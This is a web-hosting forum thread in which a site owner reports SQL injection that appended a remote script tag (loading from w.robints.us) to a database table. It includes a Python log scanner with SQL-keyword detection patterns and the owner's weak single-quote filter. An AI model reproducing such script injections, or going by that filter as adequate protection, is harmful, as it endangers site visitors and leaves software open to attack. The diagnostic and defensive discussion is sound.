HELP, Database hacked

Hi,
My database has been hacked twice in less than 1 day.
SQL injection, I think.

All fields in the database have text attached after them:
<script src="http://w.robints.us/us/js></script><script src="http://w.robints.us/us/js></script>

It is added twice after each field value in all fields.

I am protecting against SQL injection using this ASP script:
IF InStr(Request.QueryString, "'") Then Response.Redirect "/?"

Help please, it looks like it is not enough.

Can Jodo provide me any details about the hacker location?

thanks
 
To find the hacking in this case, that would be in the HTTP logs. We can aid a bit but may not be able to pinpoint.

SQL injection may be 'protected' at some level, but unprotected on a subpage or direct query via another page, not uncommon at all.
 
I checked the hacked database; only one table is hacked.
All fields in this table that are not blank and are text have this JavaScript text added to them.
 
If you provide us the domain name, we can check the web logs for it. From those we would be able to tell you the IP of the hacker and the page they are using to hack your database.
 
The issue is that this database is shared between many domains under the same account.
Is there any advice on how I can protect from SQL injection?
I have this script before any connection is opened:
<%
IF InStr(Request.QueryString, "'") Then Response.Redirect "/?"
%>
 
If it is shared by many domains, it means we will have a very hard time looking into it for you. We can work with you to send raw HTTP logs; then you can look for keywords like 'VARCHAR', 'SELECT', etc.

We can't protect the DB on the DB side; to the DB, it is a legitimate connection from an authorized source (the web server), using valid credentials as provided in your config. For the ASP/ASP.NET pages themselves, we aren't developers, but maybe some others can help.
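
The log review suggested above, as an added example that is not part of the original thread or the host's tooling: it parses IIS W3C extended logs (an assumption about the log format), URL-decodes each query string, and reports the client IP and page of requests containing SQL keywords. The log lines are constructed, and every keyword other than 'VARCHAR' and 'SELECT' is an assumption.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# 'VARCHAR' and 'SELECT' are the keywords named in the thread; DECLARE, CAST
# and EXEC are assumptions added for this example.
KEYWORDS = re.compile(r"\b(VARCHAR|SELECT|DECLARE|CAST|EXEC)\b", re.IGNORECASE)

# Constructed sample in IIS W3C extended format (assumed log format).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2024-01-15 10:00:01 GET /default.asp - 198.51.100.7 200
2024-01-15 10:00:05 GET /news.asp id=12 198.51.100.7 200
2024-01-15 10:02:11 GET /news.asp id=12;DECLARE%20@S%20VARCHAR(4000)[rest-elided] 203.0.113.9 200
2024-01-15 10:02:12 GET /shop/item.asp cat=3%20SELECT%20[elided] 203.0.113.9 500
2024-01-15 10:03:00 GET /search.asp q=select+a+plan 198.51.100.20 200
"""


def scan_w3c_log(lines):
    """Return one dict per request whose decoded query string has SQL keywords."""
    fields, hits = [], []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split(" ")))
        query = row.get("cs-uri-query", "-")
        if query == "-":  # "-" means the request had no query string
            continue
        found = sorted({k.upper() for k in KEYWORDS.findall(unquote_plus(query))})
        if found:
            hits.append({"when": f"{row.get('date')} {row.get('time')}",
                         "ip": row.get("c-ip"), "page": row.get("cs-uri-stem"),
                         "keywords": found})
    return hits


def summarize(hits):
    """Count flagged requests per (client IP, page) to show which pages to fix first."""
    return Counter((h["ip"], h["page"]) for h in hits)


if __name__ == "__main__":
    flagged = scan_w3c_log(SAMPLE_LOG.splitlines())
    for hit in flagged:
        print(hit)  # a single-keyword hit like the search request needs manual review
    print(summarize(flagged))
```

Keyword hits still need manual review, as the search request in the sample shows. IIS does not write POST bodies to these logs by default, so injection through form posts will not appear here.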
 
You need to use a server-side language like Perl, PHP, ASP, etc. to get and put data to and from the database.

Such scripts are very complex and can be very hard to make.
 